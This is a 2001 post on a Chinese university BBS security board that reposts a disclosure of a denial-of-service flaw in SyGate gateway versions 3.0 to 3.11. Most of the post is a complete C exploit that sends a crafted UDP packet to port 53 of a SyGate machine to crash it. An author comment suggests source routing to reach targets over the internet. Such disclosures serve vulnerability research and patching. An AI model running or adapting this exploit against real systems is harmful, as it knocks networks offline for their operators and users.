荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: hewlett (...), 信区: Security
标 题: Any LAN user can crash Sygate
发信站: 荔园晨风BBS站 (Mon Jun 11 22:11:46 2001), 转信
Any LAN user can crash Sygate
Jul, 08 2000 - 15:03
It is possible to cause a Denial of Service attack against Sygate's
Gateway product, by sending a bad packet to its listening UDP port. This
attack an be exploited remotely by any user on the local network.
Vulnerable systems:
SyGate 3.11
SyGate 3.1
SyGate 3.0
Exploit:
/*
Sygate Crash by: marc@eeye.com (April-00)
http://www.eEye.com
Will crash Sygate (http://www.sygate.com/) when ran from the internal
LAN.
Play with source routing to get it to work across the internet.
Just hit the Internal IP of the Sygate machine.
*/
#include <stdio.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int SockFD, addrlen, bsent;
struct sockaddr_in UDPSock;
char bomb[]= "changeiscoming";
printf("Sygate Crash by: marc@eeye.com\n");
printf("http://www.eEye.com\n\n");
if(argc<2){
printf("Usage: %s [server]\n",argv[0]);
exit(1);
}
SockFD=socket(AF_INET, SOCK_DGRAM, 0);
UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);
bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
sizeof(struct sockaddr_in));
printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}
provided by Marc.
mailto:marc@EEYE.COM
--
...
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 217.135.212.48]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店